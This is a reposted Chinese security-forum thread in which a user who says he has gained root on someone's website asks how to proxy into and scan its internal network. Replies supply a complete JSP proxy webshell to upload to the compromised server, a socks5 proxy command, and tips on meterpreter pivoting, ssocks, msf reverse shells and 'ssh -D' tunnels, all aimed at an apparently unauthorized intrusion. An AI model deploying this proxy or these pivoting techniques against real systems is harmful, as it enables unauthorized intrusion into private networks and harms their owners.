疯子求助-梧桐雨解答的jsp proxy
2016-03-30 12:07
477 查看
关于linux shell 内网如何做代理
踩(0)顶(14)
疯子 (世人笑我太疯癫,我笑世人看不穿。)
![](http://zone.wooyun.org/themes/wooyun/images/white-hat.png)
|
2014-05-30 20:24
最近渗透一个网站 拿到一个shell root权限 已提权
现在想渗透内网 想做一个代理并且扫描内网 可是一直找不到怎么做内网代理 求个好方法 谢谢 !
有好方法的或者成功的 WB 感谢!
取消收藏感谢(1)
分享到:
1
24 个回复
![](http://zone.wooyun.org/upload/avatar/avatar_108.jpg)
1# 感谢(1)
梧桐雨
![](http://zone.wooyun.org/themes/wooyun/images/v-15.png)
(ofni.uygnotuw)
![](http://zone.wooyun.org/themes/wooyun/images/white-hat.png)
|
2014-05-30 20:29
如果想漫游内网的话 在服务器上弄个sock5代理就好了。
参考例子:
http://zone.wooyun.org/content/1693
linux基本上支持python的,只要支持,那么可以试试80vul的 python socks5代理。客户端推荐用:Proxycap
如果是php,就很简单了,很多代理可扫描内网的。百度一下就有许多,结合自己实际情况改改就可以用了。
![](http://zone.wooyun.org/upload/avatar/avatar_108.jpg)
2#
梧桐雨
![](http://zone.wooyun.org/themes/wooyun/images/v-15.png)
(ofni.uygnotuw)
![](http://zone.wooyun.org/themes/wooyun/images/white-hat.png)
|
2014-05-30 20:31
80vul 的 socks5代理用法 python 文件名 你想要开的端口
例子 : python socks5.py 9999
![](http://zone.wooyun.org/upload/avatar/avatar_401.jpg)
3#
疯子 (世人笑我太疯癫,我笑世人看不穿。)
![](http://zone.wooyun.org/themes/wooyun/images/white-hat.png)
|
2014-05-30 20:37
@梧桐雨 每次都是妹子你来帮我,都不知道怎么说了,小小的1WB不成敬意!
![](http://zone.wooyun.org/upload/avatar/avatar_2568.png)
4#
xiaoL (http://www.xlixli.net)
![](http://zone.wooyun.org/themes/wooyun/images/white-hat.png)
|
2014-05-30 20:37
@梧桐雨
梧桐雨什么的最有爱了
![](http://zone.wooyun.org/upload/avatar/avatar_401.jpg)
5# 感谢(1)
疯子 (世人笑我太疯癫,我笑世人看不穿。)
![](http://zone.wooyun.org/themes/wooyun/images/white-hat.png)
|
2014-05-30 20:38
还有好的想法的 小伙伴们也共享出来 我们一起漫游内网!
![](http://zone.wooyun.org/upload/avatar/avatar_401.jpg)
6#
疯子 (世人笑我太疯癫,我笑世人看不穿。)
![](http://zone.wooyun.org/themes/wooyun/images/white-hat.png)
|
2014-05-30 20:39
@梧桐雨 恩 我这个是JAVA的tomcat jsp 所以我试一下80vul的 谢谢!
![](http://zone.wooyun.org/upload/avatar/avatar_108.jpg)
7#
梧桐雨
![](http://zone.wooyun.org/themes/wooyun/images/v-15.png)
(ofni.uygnotuw)
![](http://zone.wooyun.org/themes/wooyun/images/white-hat.png)
|
2014-05-30 20:43
@疯子 jsp一个很简单的proxy,只要用力把它甩到目标服务器上,然后这么访问:proxy.jsp?http://10.0.10.10 就可以进行漫游了,不过有些内部资源可能加载不出来。
<%@page session="false"%> <%@page import="java.net.*,java.io.*" %> <% try { String reqUrl = request.getQueryString(); URL url = new URL(reqUrl); HttpURLConnection con = (HttpURLConnection)url.openConnection(); con.setDoOutput(true); con.setRequestMethod(request.getMethod()); int clength = request.getContentLength(); if(clength > 0) { con.setDoInput(true); byte[] idata = new byte[clength]; request.getInputStream().read(idata, 0, clength); con.getOutputStream().write(idata, 0, clength); } response.setContentType(con.getContentType()); BufferedReader rd = new BufferedReader(new InputStreamReader(con.getInputStream())); String line; while ((line = rd.readLine()) != null) { out.println(line); } rd.close(); } catch(Exception e) { response.setStatus(500); } %>
把上面的代码保存成jsp就可以了。
![](http://zone.wooyun.org/upload/avatar/avatar_401.jpg)
8#
疯子 (世人笑我太疯癫,我笑世人看不穿。)
![](http://zone.wooyun.org/themes/wooyun/images/white-hat.png)
|
2014-05-30 20:45
@梧桐雨 好的 我主要还是要做扫描 所以还是用socks5 谢谢!
![](http://zone.wooyun.org/upload/avatar/avatar_55.jpg)
9#
冷冷的夜 (1)
![](http://zone.wooyun.org/themes/wooyun/images/white-hat.png)
|
2014-05-30 21:35
meterpreter
![](http://zone.wooyun.org/upload/avatar/avatar_50_50.png)
10#
DM_ (http://x0day.me)
![](http://zone.wooyun.org/themes/wooyun/images/white-hat.png)
|
2014-05-30 22:39
meta_ssh
![](http://zone.wooyun.org/upload/avatar/avatar_1938.jpg)
11#
Kuuki
![](http://zone.wooyun.org/themes/wooyun/images/white-hat.png)
|
2014-05-30 22:43
@疯子 丢一个ssocks-0.0.14.tar.gz进去 之前用过 感觉不错
![](http://zone.wooyun.org/upload/avatar/avatar_50_50.png)
12#
laterain
![](http://zone.wooyun.org/themes/wooyun/images/white-hat.png)
|
2014-05-30 23:00
ssh 做socks4代理,稳定,不漏气
没有破解密码吗?请移步http://drops.wooyun.org/tips/1951
![](http://zone.wooyun.org/upload/avatar/avatar_401.jpg)
13#
疯子 (世人笑我太疯癫,我笑世人看不穿。)
![](http://zone.wooyun.org/themes/wooyun/images/white-hat.png)
|
2014-05-30 23:24
@Kuuki 刚刚用了 发现存在一个问题 我是路由器上网的 ssocks 无法代理到我的内网 端口映射也不行 不知什么问题
![](http://zone.wooyun.org/upload/avatar/avatar_636.jpg)
14#
wefgod (求大牛指点)
![](http://zone.wooyun.org/themes/wooyun/images/white-hat.png)
|
2014-05-30 23:44
@laterain 洞主说的是内网。
![](http://zone.wooyun.org/upload/avatar/avatar_1938.jpg)
15#
Kuuki
![](http://zone.wooyun.org/themes/wooyun/images/white-hat.png)
|
2014-05-31 00:00
@疯子 应该没问题。我当时也是路由上网,我还是映射到我虚拟机里呢,你把dmz那些关了,只开端口映射
![](http://zone.wooyun.org/upload/avatar/avatar_1032.jpg)
16#
乌帽子 (业精于勤而荒于嬉,行成于思而毁于随。)
![](http://zone.wooyun.org/themes/wooyun/images/white-hat.png)
|
2014-05-31 00:53
meterpreter+povit+socks4
![](http://zone.wooyun.org/upload/avatar/avatar_1694.png)
17#
Sct7p (.)V(.) (.)_(.) (.)*(.) (.)^(.) (|)(and 1=2)(|) (.)^(.) (.)*(.) (.)_(.) (.)V(.)
![](http://zone.wooyun.org/themes/wooyun/images/white-hat.png)
|
2014-05-31 02:32
SSH
![](http://zone.wooyun.org/upload/avatar/avatar_3868.jpg)
18#
Xser (一枚屌丝)
![](http://zone.wooyun.org/themes/wooyun/images/white-hat.png)
|
2014-05-31 07:29
用msf直接生成一个shell,然后反弹就是了
![](http://zone.wooyun.org/upload/avatar/avatar_426.jpg)
19#
saline (碧池就是碧池)
![](http://zone.wooyun.org/themes/wooyun/images/white-hat.png)
|
2014-05-31 11:27
meterpreter不是应该很好的选择么。
![](http://zone.wooyun.org/upload/avatar/avatar_1971.jpg)
20#
debug
![](http://zone.wooyun.org/themes/wooyun/images/white-hat.png)
|
2014-05-31 15:30
假如拿到的服务器内网 那就用的反向代理 拿到是外网就正向的代理 socket5 msf都可以的,
![](http://zone.wooyun.org/upload/avatar/avatar_1475.jpg)
21#
BlAck.Eagle
![](http://zone.wooyun.org/themes/wooyun/images/white-hat.png)
|
2014-06-03 23:37
你没感觉代理好卡?
![](http://zone.wooyun.org/upload/avatar/avatar_937.jpg)
22#
煦阳。
![](http://zone.wooyun.org/themes/wooyun/images/white-hat.png)
|
2014-06-04 02:00
如果可以直接ssh的话.. putty直接就可以代理的.
我是说如果可以直接ssh的。
![](http://zone.wooyun.org/upload/avatar/avatar_50_50.png)
23#
gerfalke
![](http://zone.wooyun.org/themes/wooyun/images/white-hat.png)
|
2014-06-07 12:09
ssocks这个工具挺好用的,可以正向也可以反弹的
![](http://zone.wooyun.org/upload/avatar/avatar_2078.jpg)
24#
小森森 (学习中……)
![](http://zone.wooyun.org/themes/wooyun/images/white-hat.png)
|
2014-06-07 13:54
ssh啊。。。
ssh -D 1080 host
在本机开一个1080的socks5,通过ssh隧道代理
相关文章推荐
- Web动态加载JS外部文件(script标签)
- js Eventutil内容
- js 定义数组,初始化
- JS中使用onkeydown事件来实现键盘效果
- json处理中文,不编码Unicode
- EL表达式
- javascript的原型链简单了解
- Html5之高级-7 HTML5 Chart.js(概述、入门、使用)
- js怎样替换反斜杠
- extjs控制器调用其他视图的函数实现控件赋值。
- 原生js实现表单的正则验证,所有验证都通过后提交按钮才可用
- jsp页面使用C标签对时间日期进行判断
- JS 事件基础 边框拖拽
- javascript的Prototype属性应用
- 浏览器加载渲染HTML、DOM、CSS、 JAVASCRIPT、IMAGE、FLASH、IFRAME、SRC属性等资源的顺序总结
- js内置对象
- JS常用自定义方法
- 如何在浏览器的控制台中输出json对象,以及添加代码调试。
- JSP的执行过程
- javascript Math.random(),Math.floor(),Math.ceil(),Math.round()